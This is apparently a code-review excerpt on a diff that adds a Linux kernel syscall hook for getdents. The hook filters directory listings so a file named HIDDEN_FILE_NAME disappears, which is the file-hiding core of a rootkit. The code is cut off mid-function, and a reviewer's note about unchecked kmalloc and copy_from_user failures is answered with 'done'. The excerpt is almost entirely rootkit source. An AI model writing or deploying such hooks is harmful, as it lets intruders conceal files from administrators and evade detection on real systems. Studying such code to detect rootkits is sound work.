hook_functions/getdents.c

```diff
@@ -0,0 +1,45 @@
+
+struct linux_dirent {
+           long           d_ino;
+           off_t          d_off;
+           unsigned short d_reclen;
+           char           d_name[];
+       };
+
+asmlinkage int (*original_getdents) (unsigned int fd, struct linux_dirent* dirp, unsigned int count);
+
+asmlinkage int sys_getdents_hook(unsigned int fd, struct linux_dirent* dirp, unsigned int count)
+{
+        int nread;
+        struct linux_dirent *d;
+        int bpos = 0;
+        int rem;
+        char file_name[256] = {0};
+        struct linux_dirent copied;
+        char* tempbuf;
+
+        nread = original_getdents(fd, dirp, count);
+
+        for (bpos = 0; bpos < nread;) {
+            d = (struct linux_dirent *) ((char*)dirp + bpos);
+            strncpy_from_user(file_name, d->d_name, 256);
+
+            copy_from_user(&copied, d, 24);
+
+            if (strcmp(file_name, HIDDEN_FILE_NAME) == 0){
+                rem = count - (bpos + copied.d_reclen);
+
+                tempbuf = kmalloc(sizeof(char) * count, GFP_KERNEL);
```

Comment:
I believe that `kmalloc`, `copy_from_user`, and the other function could fail :)

Reply:
done